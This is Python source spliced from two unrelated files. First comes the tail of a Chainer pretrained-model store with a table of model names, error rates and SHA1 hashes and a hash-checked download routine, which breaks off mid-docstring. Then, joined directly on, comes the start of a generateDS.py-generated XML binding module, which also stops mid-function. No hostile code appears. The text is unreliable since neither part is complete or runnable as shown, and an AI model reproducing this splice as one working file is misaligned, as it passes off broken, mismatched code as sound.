('seresnet542bn_cifar100', '1887', 'dac530d68dff49ec37756212d3f9b52c256448fb', 'v0.0.385'),
('seresnet542bn_svhn', '0226', '9571b88bd6ac07407a453651feb29b376609933c', 'v0.0.385'),
('sepreresnet20_cifar10', '0618', 'cbc1c4df6061046a7cf99e5739a5c5df811da420', 'v0.0.379'),
('sepreresnet20_cifar100', '2831', 'e54804186c83656f8d9705ff021fd83772a0c6eb', 'v0.0.379'),
('sepreresnet20_svhn', '0324', '04dafec1e0490ecc7001a0ca9547b60ba6314956', 'v0.0.379'),
('sepreresnet56_cifar10', '0451', '0b34942c73cd2d196aa01763fb5167cb78f2b56d', 'v0.0.379'),
('sepreresnet56_cifar100', '2305', '1138b50001119765d50eeaf10a3fca15ccf6040a', 'v0.0.379'),
('sepreresnet56_svhn', '0271', '150740af292a0c5c8a6d499dfa13b2a2c5672e60', 'v0.0.379'),
('sepreresnet110_cifar10', '0454', '4c062f46d2ec615cbfc0e07af12febcddcd16364', 'v0.0.379'),
('sepreresnet110_cifar100', '2261', 'b525d8b1568e1cad021026930f5b5283bdba8b49', 'v0.0.379'),
('sepreresnet110_svhn', '0259', 'eec4c9f3c94cad32557f0a969a8ec1d127877ab6', 'v0.0.379'),
('sepreresnet164bn_cifar10', '0373', 'e82ad7ffc78c00ad128ab4116dbd3f3eae028c19', 'v0.0.379'),
('sepreresnet164bn_cifar100', '2005', 'baf00211c3da54ddf50000629b8419da8af599d8', 'v0.0.379'),
('sepreresnet164bn_svhn', '0256', '36362d66943c89b7b7153eeaf0cfc2113369b6d5', 'v0.0.379'),
('sepreresnet272bn_cifar10', '0339', '02e141138736d647bcbdb4f0fc0d81a7bc8bef85', 'v0.0.379'),
('sepreresnet272bn_cifar100', '1913', 'd37b7af28056f42bbd11df19479cbdb0b0ac7f63', 'v0.0.379'),
('sepreresnet272bn_svhn', '0249', '44b18f81ea4ba5ec6a7ea725fc9c0798a670c161', 'v0.0.379'),
('sepreresnet542bn_cifar10', '0308', '1e726874123afc10d24cf58779347b13fdfa3b00', 'v0.0.382'),
('sepreresnet542bn_cifar100', '1945', 'aadac5fbe15f5227ff02cdf9abf3c2f27b602db4', 'v0.0.382'),
('sepreresnet542bn_svhn', '0247', 'ff5682df9a051821a4fda0a1f1fe81dbf96da479', 'v0.0.382'),
('pyramidnet110_a48_cifar10', '0372', '965fce37e26ef4e3724df869fe90283669fe9daf', 'v0.0.184'),
('pyramidnet110_a48_cifar100', '2095', 'b74f12c8d11de3ddd9fa51fe93c1903675a43a3c', 'v0.0.186'),
('pyramidnet110_a48_svhn', '0247', 'e750bd672b24bb60eca0527fd11f9866a9fc8329', 'v0.0.281'),
('pyramidnet110_a84_cifar10', '0298', '7b38a0f65de0bec2f4ceb83398fef61009a2c129', 'v0.0.185'),
('pyramidnet110_a84_cifar100', '1887', '842b3809619ec81c6e27defcad9df5c3dbc0ae55', 'v0.0.199'),
('pyramidnet110_a84_svhn', '0243', '56b06d8fd9ec043ccf5acc0b8a129bee2ef9a901', 'v0.0.392'),
('pyramidnet110_a270_cifar10', '0251', 'b3456ddd5919ef861ec607f8287bd071de0ba077', 'v0.0.194'),
('pyramidnet110_a270_cifar100', '1710', '56ae71355de25daafe34c51b91fe5b4bdab1f6ac', 'v0.0.319'),
('pyramidnet110_a270_svhn', '0238', 'fdf9f2da74bae9d4280f329554a12c9770fde52f', 'v0.0.393'),
('pyramidnet164_a270_bn_cifar10', '0242', '783e21b5856a46ee0087535776703eb7ca0c24ae', 'v0.0.264'),
('pyramidnet164_a270_bn_cifar100', '1670', '7614c56c52d9a6ca42d0446ab7b5c9a5e4eae63f', 'v0.0.312'),
('pyramidnet164_a270_bn_svhn', '0233', '6dcd188245b4c4edc8a1c751cd54211d26e2c603', 'v0.0.396'),
('pyramidnet200_a240_bn_cifar10', '0244', '89ae1856e23a67aac329df11775346e6bf8e00b7', 'v0.0.268'),
('pyramidnet200_a240_bn_cifar100', '1609', '0729db3729da20627c7e91bd1e9beff251f2b82c', 'v0.0.317'),
('pyramidnet200_a240_bn_svhn', '0232', 'b5876d02190e3e6a7dc7c0cd6e931e96151c34e9', 'v0.0.397'),
('pyramidnet236_a220_bn_cifar10', '0247', '6b9a29664f54d8ea82afc863670a79099e6f570a', 'v0.0.285'),
('pyramidnet236_a220_bn_cifar100', '1634', 'fd14728bc8ca8ccb205880d24d38740dad232d00', 'v0.0.312'),
('pyramidnet236_a220_bn_svhn', '0235', 'bb39a3c6f8ee25c32a40304ebf266a9521b513c4', 'v0.0.398'),
('pyramidnet272_a200_bn_cifar10', '0239', '533f8d89abe57656e1baef549dabedbc4dcefbe8', 'v0.0.284'),
('pyramidnet272_a200_bn_cifar100', '1619', '4ba0ea07d5f519878d33f7b3741f742ae12fef50', 'v0.0.312'),
('pyramidnet272_a200_bn_svhn', '0240', '2ace26878c803cc3a415d8f897bf9d3ec7f4d19c', 'v0.0.404'),
('densenet40_k12_cifar10', '0561', 'a37df881a11487fdde772254a82c20c3e45b461b', 'v0.0.193'),
('densenet40_k12_cifar100', '2490', 'd06839db7eec0331354ca31b421c6fbcd4665fd3', 'v0.0.195'),
('densenet40_k12_svhn', '0305', '8d563cdf9dcd1d4822669f6119f6e77b4e03c162', 'v0.0.278'),
('densenet40_k12_bc_cifar10', '0643', '234918e7144b95454e1417035c73391663a68401', 'v0.0.231'),
('densenet40_k12_bc_cifar100', '2841', '968e5667c29dd682a90c3f8a488e00a9efe0d29f', 'v0.0.232'),
('densenet40_k12_bc_svhn', '0320', '52bd79007dd8a8b60b9aef94a555161c9faf4b37', 'v0.0.279'),
('densenet40_k24_bc_cifar10', '0452', '3ec459af58cf2106bfcbdad090369a1f3d41ef3c', 'v0.0.220'),
('densenet40_k24_bc_cifar100', '2267', 'f744296d04d703c202b0b78cdb32e7fc40116584', 'v0.0.221'),
('densenet40_k24_bc_svhn', '0290', '268af51aaea47003c9ce128ddb76507dabb0726e', 'v0.0.280'),
('densenet40_k36_bc_cifar10', '0404', '6be4225a6d0e5fb68bdc9cda471207c0b5420395', 'v0.0.224'),
('densenet40_k36_bc_cifar100', '2050', '49b6695fe06d98cfac5d4fdbdb716edb268712c2', 'v0.0.225'),
('densenet40_k36_bc_svhn', '0260', '47ef4d80ef3f541b795a1aee645ff9e8bada6101', 'v0.0.311'),
('densenet100_k12_cifar10', '0366', '85031735e1c80d3a6254fe8649c5e9bae2d54315', 'v0.0.205'),
('densenet100_k12_cifar100', '1964', 'f04f59203ad863f466c25fa9bbfc18686d72a46a', 'v0.0.206'),
('densenet100_k12_svhn', '0260', 'c57bbabec45492bcc4a2587443b06bf400c6ea25', 'v0.0.311'),
('densenet100_k24_cifar10', '0313', '939ef3090b6219e5afabc97f03cc34365c729ada', 'v0.0.252'),
('densenet100_k24_cifar100', '1808', '47274dd8a35bfeb77e9a077275111e4a94d561e4', 'v0.0.318'),
('densenet100_k12_bc_cifar10', '0416', '160a064165eddf492970a99b5a8ca9689bf94fea', 'v0.0.189'),
('densenet100_k12_bc_cifar100', '2119', 'a37ebc2a083fbe8e7642988945d1092fb421f182', 'v0.0.208'),
('densenet190_k40_bc_cifar10', '0252', '57f2fa706376545c260f4848a1112cd03069a323', 'v0.0.286'),
('densenet250_k24_bc_cifar10', '0267', '03b268872cdedadc7196783664b4d6e72b00ecd2', 'v0.0.290'),
('densenet250_k24_bc_cifar100', '1739', '9100f02ada0459792e3305feddda602e3278833a', 'v0.0.303'),
('xdensenet40_2_k24_bc_cifar10', '0531', 'd3c448ab2c110f873579093ff9a69e735d80b4e7', 'v0.0.226'),
('xdensenet40_2_k24_bc_cifar100', '2396', '84357bb40bcd1da5cf6237ea5755a309bcf36d49', 'v0.0.227'),
('xdensenet40_2_k24_bc_svhn', '0287', '065f384765a1eaaba26d1d9224878658cbb9cb84', 'v0.0.306'),
('xdensenet40_2_k36_bc_cifar10', '0437', 'fb6d7431c005eb9965da0e1b2872c048d6b31b30', 'v0.0.233'),
('xdensenet40_2_k36_bc_cifar100', '2165', '9ac51e902167ba05f1c21ed1a9690c1fd4cad3eb', 'v0.0.234'),
('xdensenet40_2_k36_bc_svhn', '0274', 'bf7f7de9f9b9661385a47b5e241fdc0c54287a8c', 'v0.0.306'),
('wrn16_10_cifar10', '0293', '4ac60015e3b287580d11e605793b3426e8184137', 'v0.0.166'),
('wrn16_10_cifar100', '1895', 'd6e852788e29532c8a12bb39617a2e81aba2483f', 'v0.0.204'),
('wrn16_10_svhn', '0278', 'b87185c815b64a1290ecbb7a217447906c77da75', 'v0.0.271'),
('wrn28_10_cifar10', '0239', 'f8a24941ca542f78eda2d192f461b1bac0600d27', 'v0.0.166'),
('wrn28_10_cifar100', '1788', '603872998b7d9f0303769cb34c4cfd16d4e09258', 'v0.0.320'),
('wrn28_10_svhn', '0271', '59f255be865678bc0d3c7dcc9785022f30265d69', 'v0.0.276'),
('wrn40_8_cifar10', '0237', '3f56f24a07be7155fb143cc4360755d564e3761a', 'v0.0.166'),
('wrn40_8_cifar100', '1803', '794aca6066fb993f2a5511df45fca58d6bc546e7', 'v0.0.321'),
('wrn40_8_svhn', '0254', '8af6aad0c2034ed8a574f74391869a0d20def51b', 'v0.0.277'),
('wrn20_10_1bit_cifar10', '0326', '3288c59a265fc3531502b9c53e33322ff74dd33f', 'v0.0.302'),
('wrn20_10_1bit_cifar100', '1904', '1c6f1917c49134da366abfbd27c1d7ad61182882', 'v0.0.302'),
('wrn20_10_1bit_svhn', '0273', '4d7bfe0dfa88d593f691b39ca9d20eb3e78636ea', 'v0.0.302'),
('wrn20_10_32bit_cifar10', '0314', '90b3fc15d99009b35b1939baefa2e2290003968a', 'v0.0.302'),
('wrn20_10_32bit_cifar100', '1812', '346f276fe7e6b61cc93482fdb3d471064d1e1de3', 'v0.0.302'),
('wrn20_10_32bit_svhn', '0259', 'af3fddd1f68f373038eea1828e7ae15d21a03ef9', 'v0.0.302'),
('ror3_56_cifar10', '0543', '7ca1b24c4a573d53484ca92b19bad5c08e38fa8b', 'v0.0.228'),
('ror3_56_cifar100', '2549', 'a7903e5f5f80bf53c07e12ce34659e0d9af4b106', 'v0.0.229'),
('ror3_56_svhn', '0269', '113859bb3c23fde05fce740647a26dca69678a34', 'v0.0.287'),
('ror3_110_cifar10', '0435', 'bf021f253fc1cf29b30a1eb579c7c4693f963933', 'v0.0.235'),
('ror3_110_cifar100', '2364', '13de922a8f8758a15eaf1d283dc42e7dcf0f3fda', 'v0.0.236'),
('ror3_110_svhn', '0257', '4b8b6963fd73753104945853a65210de84c9fb4c', 'v0.0.287'),
('ror3_164_cifar10', '0393', '7ac7b44610acdb065f40b62e94d5ec5dbb49ee11', 'v0.0.294'),
('ror3_164_cifar100', '2234', 'd5a5321048d06f554a8c7688b743c32da830372b', 'v0.0.294'),
('ror3_164_svhn', '0273', '1d0a2f127a194ea923857c1d8ec732ae5fa87300', 'v0.0.294'),
('rir_cifar10', '0328', '9780c77d0ab1c63478531557ab1aff77c208ad0d', 'v0.0.292'),
('rir_cifar100', '1923', '4bfd2f239ecca391c116cbc02d2ef7e5e2a54028', 'v0.0.292'),
('rir_svhn', '0268', '5240bc967aa1fc1e9df2b31919178203dcaa582a', 'v0.0.292'),
('shakeshakeresnet20_2x16d_cifar10', '0515', 'e2f524b5196951f48495973a087135ca974ec327', 'v0.0.215'),
('shakeshakeresnet20_2x16d_cifar100', '2922', '84772a31f6f6bb3228276515a8d4371c25925c85', 'v0.0.247'),
('shakeshakeresnet20_2x16d_svhn', '0317', '261fd59fcb7cf375331ce0c402ad2030b283c17c', 'v0.0.295'),
('shakeshakeresnet26_2x32d_cifar10', '0317', '5422fce187dff99fa8f4678274a8dd1519e23e27', 'v0.0.217'),
('shakeshakeresnet26_2x32d_cifar100', '1880', '750a574e738cf53079b6965410e07fb3abef82fd', 'v0.0.222'),
('shakeshakeresnet26_2x32d_svhn', '0262', '844e1f6d067b830087b9456617159a77137138f7', 'v0.0.295'),
('diaresnet20_cifar10', '0622', '1c5f4c8adeb52090b5d1ee7330f02b96d4aac843', 'v0.0.340'),
('diaresnet20_cifar100', '2771', '350c5ed4fa58bf339b8b44f19044d75ee14917cf', 'v0.0.342'),
('diaresnet20_svhn', '0323', 'f37bac8b8843319d2934a79e62c0e7365addef2f', 'v0.0.342'),
('diaresnet56_cifar10', '0505', '4073bb0c53d239a40c6cf7ee634f32096b1d54dd', 'v0.0.340'),
('diaresnet56_cifar100', '2435', '22e777d2b708b1fc8eb79e593130fa660b51dd95', 'v0.0.342'),
('diaresnet56_svhn', '0268', '7ea0022b7eff7afd1bb53e81d579e23952f9ee7f', 'v0.0.342'),
('diaresnet110_cifar10', '0410', '5d0517456f3d535722d4f3fade53146ffd8e9f5f', 'v0.0.340'),
('diaresnet110_cifar100', '2211', '4c6aa3fe0a58d54ce04061df8440b798b73c9c4b', 'v0.0.342'),
('diaresnet110_svhn', '0247', '515ce8f3ddc01b00747b839e8b52387f231f482f', 'v0.0.342'),
('diaresnet164bn_cifar10', '0350', '27cfe80d62974bfc1d3aa52e1fd1d173d5067393', 'v0.0.340'),
('diaresnet164bn_cifar100', '1953', '18aa50ab105095688597937fcafdbae1d5518597', 'v0.0.342'),
('diaresnet164bn_svhn', '0244', '4773b5183a25ef906e176079f3cae8641a167e13', 'v0.0.342'),
('diapreresnet20_cifar10', '0642', 'bfcfd5c633e563036061d10d420ea6878f102ddb', 'v0.0.343'),
('diapreresnet20_cifar100', '2837', '936a4acca4a570be185c6338e0a76c8d8cee78a9', 'v0.0.343'),
('diapreresnet20_svhn', '0303', 'd682b80f3a2f5d126eac829dc3a55d800a6e3998', 'v0.0.343'),
('diapreresnet56_cifar10', '0483', 'd5229916f76180aa66a08d89645c1cdd1bbf4bf1', 'v0.0.343'),
('diapreresnet56_cifar100', '2505', '9867b907f721c3688bc9577e2d30e71aac14e163', 'v0.0.343'),
('diapreresnet56_svhn', '0280', '7a984a6375979ecce61576cc371ed5170a4b2cd2', 'v0.0.343'),
('diapreresnet110_cifar10', '0425', '9fab76b9a11b246b0e06386879b29196af002de5', 'v0.0.343'),
('diapreresnet110_cifar100', '2269', '0af00d413f9c7022ebec87256760b40ccb30e944', 'v0.0.343'),
('diapreresnet110_svhn', '0242', '2bab754f7a7d426eb5a1f40c3156e2c82aa145c2', 'v0.0.343'),
('diapreresnet164bn_cifar10', '0356', '7a0b124307fe307489743d8648e99239e14b764a', 'v0.0.343'),
('diapreresnet164bn_cifar100', '1999', 'a3835edf5ae8daa0383e8d13fedf3a8dc8352338', 'v0.0.343'),
('diapreresnet164bn_svhn', '0256', '30de9b3b60e03ab5c44bf7d9b571f63a9065890d', 'v0.0.343'),
('resnet10_cub', '2760', 'e8bdefb0f503d253197370a2d9d5ae772b2cb913', 'v0.0.335'),
('resnet12_cub', '2667', '22b2b21696461aa952a257014f4f0ec901375ac5', 'v0.0.336'),
('resnet14_cub', '2434', '57f6a73d2eb22d7dfc43a8ff52f25982e1b7d78b', 'v0.0.337'),
('resnet16_cub', '2321', '5e48b19f8fb8eae1afcdf04e77ae3ad9ad9c6b73', 'v0.0.338'),
('resnet18_cub', '2333', 'c32998b4b12e31b9d291770bbf3eb38490542e38', 'v0.0.344'),
('resnet26_cub', '2261', '56c8fcc12333fec68ac09c6696bb462e175be047', 'v0.0.345'),
('seresnet10_cub', '2742', 'b8e56acfe873705609c82932c321467169436531', 'v0.0.361'),
('seresnet12_cub', '2599', '9c0ee8cf33733bf5ba66eeda7394c84ed11d3d7e', 'v0.0.361'),
('seresnet14_cub', '2368', 'b58cddb7b2cc8f5c40a83912690eeff8d4d6d418', 'v0.0.361'),
('seresnet16_cub', '2318', '1d8b187c417832ac3f19806ff13f1897c7692f4f', 'v0.0.361'),
('seresnet18_cub', '2321', '7b1d02a7965a3f54606d768e0e5149148f2fb0b1', 'v0.0.361'),
('seresnet26_cub', '2254', '5cbf65d229088b3f16e396a05bde054470c14563', 'v0.0.361'),
('mobilenet_w1_cub', '2356', '02c2accf0f92fcc460cdbb6b41a581321e1fa216', 'v0.0.346'),
('proxylessnas_mobile_cub', '2190', 'a9c66b1b9623f81105b9daf8c5e45f4501e80bbe', 'v0.0.347'),
('ntsnet_cub', '1286', '4d7595248f0fb042ef06c657d73bd0a2f3fc4f0d', 'v0.0.334'),
('pspnet_resnetd101b_voc', '7626', 'f90c0db9892ec6892623a774ba21000f7cc3995f', 'v0.0.297'),
('pspnet_resnetd50b_ade20k', '2746', '7b7ce5680fdfab567222ced11a2430cf1a452116', 'v0.0.297'),
('pspnet_resnetd101b_ade20k', '3286', 'c5e619c41740751865f662b539abbad5dd9be42b', 'v0.0.297'),
('pspnet_resnetd101b_cityscapes', '5757', '2e2315d45b83479c507a4e7a47dac6a68a8e3e1c', 'v0.0.297'),
('pspnet_resnetd101b_coco', '5467', '690335581310128a1d11fcdb0eb03ce07fb5f88d', 'v0.0.297'),
('deeplabv3_resnetd101b_voc', '7566', '6a4f805fe1433898d1dc665bb10a5620816999bd', 'v0.0.298'),
('deeplabv3_resnetd152b_voc', '7806', '1c3089b5034043e4a82567ae28b085d694e5319c', 'v0.0.298'),
('deeplabv3_resnetd50b_ade20k', '3196', '00903dce3d63fd847c36617d51907cff12834d06', 'v0.0.298'),
('deeplabv3_resnetd101b_ade20k', '3517', '46828740498741a7291fd479901dfba3d3de3b11', 'v0.0.298'),
('deeplabv3_resnetd101b_coco', '5906', '2811b3cd3512c237faef59f746d984823892d9e5', 'v0.0.298'),
('deeplabv3_resnetd152b_coco', '6107', '80ddcd964c41906f4bc104cf5b087303a06aa79f', 'v0.0.298'),
('fcn8sd_resnetd101b_voc', '8040', '3568dc41c137cbe797c1baa7b5a76669faf1ceb0', 'v0.0.299'),
('fcn8sd_resnetd50b_ade20k', '3339', '1d03bc38ea64551806ddfd4185b5eb49fb9e160f', 'v0.0.299'),
('fcn8sd_resnetd101b_ade20k', '3588', 'ff385e1913bc8c05c6abe9cb19896f477b9b75a7', 'v0.0.299'),
('fcn8sd_resnetd101b_coco', '6011', '4a469997cdc3e52c1dee1a2d58578f9df54c419b', 'v0.0.299'),
('icnet_resnetd50b_cityscapes', '6078', '04f581dc985f3d2874e8530bb70e529302e9d3dd', 'v0.0.457'),
('fastscnn_cityscapes', '6595', '6dca42601bbba8134afa11674ba606231e30f035', 'v0.0.474'),
('sinet_cityscapes', '6084', 'c0a4e992f64c042ac815b87fe8d37919a693d0ad', 'v0.0.437'),
('bisenet_resnet18_celebamaskhq', '0000', 'c3bd2251b86e4fce29a3d1fb7600c6259d4d6523', 'v0.0.462'),
('danet_resnetd50b_cityscapes', '6799', 'dcef11be5a3e3984877c9d2b8644a630938eb25a', 'v0.0.468'),
('danet_resnetd101b_cityscapes', '6810', 'a6593e21091fb7d96989866381fe484de50a5d70', 'v0.0.468'),
('alphapose_fastseresnet101b_coco', '7415', 'c1aee8e0e4aaa1352d728ad5f147d77b9ebeff8d', 'v0.0.454'),
('simplepose_resnet18_coco', '6631', 'e267629f3da46f502914d84c10afb52a5ea12e3b', 'v0.0.455'),
('simplepose_resnet50b_coco', '7102', '78b005c871baaf5a77d7c8de41eac8ec01b7d942', 'v0.0.455'),
('simplepose_resnet101b_coco', '7244', '59f85623525928ba8601eefc81c781f0a48dd72e', 'v0.0.455'),
('simplepose_resnet152b_coco', '7253', '6228ce42852da4e01b85917f234bf74cc0962e8f', 'v0.0.455'),
('simplepose_resneta50b_coco', '7170', 'e45c65255002eb22c2aa39ff4ee4d7d1c902467c', 'v0.0.455'),
('simplepose_resneta101b_coco', '7297', '800500538da729d33bd7e141b3b7c80738b33c47', 'v0.0.455'),
('simplepose_resneta152b_coco', '7344', 'ac76d0a9dd51dcbe770ce3044567bc53f21d8fc4', 'v0.0.455'),
('simplepose_mobile_resnet18_coco', '6625', 'a5201083587dbc1f9e0b666285872f0ffcb23f88', 'v0.0.456'),
('simplepose_mobile_resnet50b_coco', '7110', '6d17c89b71fa02db4903ac4ba08922c1c267dcf5', 'v0.0.456'),
('simplepose_mobile_mobilenet_w1_coco', '6410', '14efcbbaf1be6e08448a89feb3161e572466de20', 'v0.0.456'),
('simplepose_mobile_mobilenetv2b_w1_coco', '6374', '73b90839e07f59decdbc11cbffff196ed148e1d9', 'v0.0.456'),
('simplepose_mobile_mobilenetv3_small_w1_coco', '5434', 'cc5169a3ac2cb3311d02bc4752abc0f799bc4492', 'v0.0.456'),
('simplepose_mobile_mobilenetv3_large_w1_coco', '6367', 'b93dbd09bdb07fd33732aaf9e782148cbb394cd3', 'v0.0.456'),
('lwopenpose2d_mobilenet_cmupan_coco', '3999', '0a2829dcb84ea39a401dbfb6b4635d68cc1e23ca', 'v0.0.458'),
('lwopenpose3d_mobilenet_cmupan_coco', '3999', 'ef1e8e130485a5df9864db59f93ddeb892c11a46', 'v0.0.458'),
('ibppose_coco', '6487', '70158be1fc226d4b3608d02273898e887edf744a', 'v0.0.459'),
('jasperdr10x5_en', 'nana', '9e212ca84c4ecd876462c289754ab71fa845c445', 'v0.0.555'),
('jasperdr10x5_en_nr', 'nana', 'cf4b9f5320ed72868104d0bfb44a6012be348a0b', 'v0.0.555'),
('quartznet5x5_en_ls', 'nana', '3651852c5a78ae2c9f2f58aa6936bc75db83a30a', 'v0.0.555'),
('quartznet15x5_en', 'nana', 'd41a53cf8fc87d229d7c464a034ab33347d05e8f', 'v0.0.555'),
('quartznet15x5_en_nr', 'nana', 'c73f88532c594801f76b7db921f1c7c3fcf08fc0', 'v0.0.555'),
('quartznet15x5_de', 'nana', '02b5f71ff83de19d97f6770566b0d57cc2ea1bb9', 'v0.0.555'),
('quartznet15x5_fr', 'nana', '62c42726412bd3b97a668632f78225351bf040ed', 'v0.0.555'),
('quartznet15x5_it', 'nana', '6712dfefb2f1cb997f467ffb7feb0ceb94f2a046', 'v0.0.555'),
('quartznet15x5_es', 'nana', '96f14570ed8f75d1b2ebb1e13e20dd28a128c99b', 'v0.0.555'),
('quartznet15x5_ca', 'nana', 'a8ba8cb3da5bda15a6a0d2fb30ced54459a0f0ff', 'v0.0.555'),
('quartznet15x5_pl', 'nana', 'a1ea93770043bd852a21a4e8c29c366268ce27d5', 'v0.0.555'),
('quartznet15x5_ru', 'nana', 'cb5585439804c94ef9d8d39a5bc483932fe4acd0', 'v0.0.555'),
('quartznet15x5_ru34', 'nana', 'b4dd1c93ecb01dd79276f3e13bec8d36c6249d02', 'v0.0.555'),
]}
imgclsmob_repo_url = 'https://github.com/osmr/imgclsmob'
def get_model_name_suffix_data(model_name):
if model_name not in _model_sha1:
raise ValueError("Pretrained model for {name} is not available.".format(name=model_name))
error, sha1_hash, repo_release_tag = _model_sha1[model_name]
return error, sha1_hash, repo_release_tag
def get_model_file(model_name,
local_model_store_dir_path=os.path.join("~", ".chainer", "models")):
"""
Return location for the pretrained on local file system. This function will download from online model zoo when
model cannot be found or has mismatch. The root directory will be created if it doesn't exist.
Parameters:
----------
model_name : str
Name of the model.
local_model_store_dir_path : str, default $CHAINER_HOME/models
Location for keeping the model parameters.
Returns:
-------
file_path
Path to the requested pretrained model file.
"""
error, sha1_hash, repo_release_tag = get_model_name_suffix_data(model_name)
short_sha1 = sha1_hash[:8]
file_name = "{name}-{error}-{short_sha1}.npz".format(
name=model_name,
error=error,
short_sha1=short_sha1)
local_model_store_dir_path = os.path.expanduser(local_model_store_dir_path)
file_path = os.path.join(local_model_store_dir_path, file_name)
if os.path.exists(file_path):
if _check_sha1(file_path, sha1_hash):
return file_path
else:
logging.warning("Mismatch in the content of model file detected. Downloading again.")
else:
logging.info("Model file not found. Downloading to {}.".format(file_path))
if not os.path.exists(local_model_store_dir_path):
os.makedirs(local_model_store_dir_path)
zip_file_path = file_path + ".zip"
_download(
url="{repo_url}/releases/download/{repo_release_tag}/{file_name}.zip".format(
repo_url=imgclsmob_repo_url,
repo_release_tag=repo_release_tag,
file_name=file_name),
path=zip_file_path,
overwrite=True)
with zipfile.ZipFile(zip_file_path) as zf:
zf.extractall(local_model_store_dir_path)
os.remove(zip_file_path)
if _check_sha1(file_path, sha1_hash):
return file_path
else:
raise ValueError("Downloaded file has different hash. Please try again.")
def _download(url, path=None, overwrite=False, sha1_hash=None, retries=5, verify_ssl=True):
"""Download an given URL
Parameters:
----------
url : str
URL to download
path | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Thu Dec 6 12:13:05 2018 by generateDS.py version 2.30.8.
# Python 3.6.1 (v3.6.1:69c0db5, Mar 21 2017, 18:41:36) [MSC v.1900 64 bit (AMD64)]
#
# Command line options:
# ('-o', 'webapp.py')
#
# Command line arguments:
# webapp.xsd
#
# Command line:
# C:\Users\ljaqueme\DOCUME~1\02-THR~1\05-INT~1\10-IR-~1\V_IR-T~2\Scripts\generateDS -o "webapp.py" webapp.xsd
#
# Current working directory (os.getcwd()):
# gen
#
import sys
import re as re_
import base64
import datetime as datetime_
import warnings as warnings_
try:
from lxml import etree as etree_
except ImportError:
from xml.etree import ElementTree as etree_
Validate_simpletypes_ = True
if sys.version_info.major == 2:
BaseStrType_ = basestring
else:
BaseStrType_ = str
def parsexml_(infile, parser=None, **kwargs):
if parser is None:
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
try:
parser = etree_.ETCompatXMLParser()
except AttributeError:
# fallback to xml.etree
parser = etree_.XMLParser()
doc = etree_.parse(infile, parser=parser, **kwargs)
return doc
def parsexmlstring_(instring, parser=None, **kwargs):
if parser is None:
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
try:
parser = etree_.ETCompatXMLParser()
except AttributeError:
# fallback to xml.etree
parser = etree_.XMLParser()
element = etree_.fromstring(instring, parser=parser, **kwargs)
return element
#
# Namespace prefix definition table (and other attributes, too)
#
# The module generatedsnamespaces, if it is importable, must contain
# a dictionary named GeneratedsNamespaceDefs. This Python dictionary
# should map element type names (strings) to XML schema namespace prefix
# definitions. The export method for any class for which there is
# a namespace prefix definition, will export that definition in the
# XML representation of that element. See the export method of
# any generated element type class for a example of the use of this
# table.
# A sample table is:
#
# # File: generatedsnamespaces.py
#
# GenerateDSNamespaceDefs = {
# "ElementtypeA": "http://www.xxx.com/namespaceA",
# "ElementtypeB": "http://www.xxx.com/namespaceB",
# }
#
try:
from generatedsnamespaces import GenerateDSNamespaceDefs as GenerateDSNamespaceDefs_
except ImportError:
GenerateDSNamespaceDefs_ = {}
#
# The root super-class for element type classes
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ImportError as exp:
class GeneratedsSuper(object):
tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')
class _FixedOffsetTZ(datetime_.tzinfo):
def __init__(self, offset, name):
self.__offset = datetime_.timedelta(minutes=offset)
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return None
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_validate_string(self, input_data, node=None, input_name=''):
if not input_data:
return ''
else:
return input_data
def gds_format_base64(self, input_data, input_name=''):
return base64.b64encode(input_data)
def gds_validate_base64(self, input_data, node=None, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_validate_integer(self, input_data, node=None, input_name=''):
return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_integer_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
int(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of integers')
return values
def gds_format_float(self, input_data, input_name=''):
return ('%.15f' % input_data).rstrip('0')
def gds_validate_float(self, input_data, node=None, input_name=''):
return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_float_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of floats')
return values
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_validate_double(self, input_data, node=None, input_name=''):
return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_double_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of doubles')
return values
def gds_format_boolean(self, input_data, input_name=''):
return ('%s' % input_data).lower()
def gds_validate_boolean(self, input_data, node=None, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_boolean_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(
node,
'Requires sequence of booleans '
'("true", "1", "false", "0")')
return values
def gds_validate_datetime(self, input_data, node=None, input_name=''):
return input_data
def gds_format_datetime(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d.%s' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
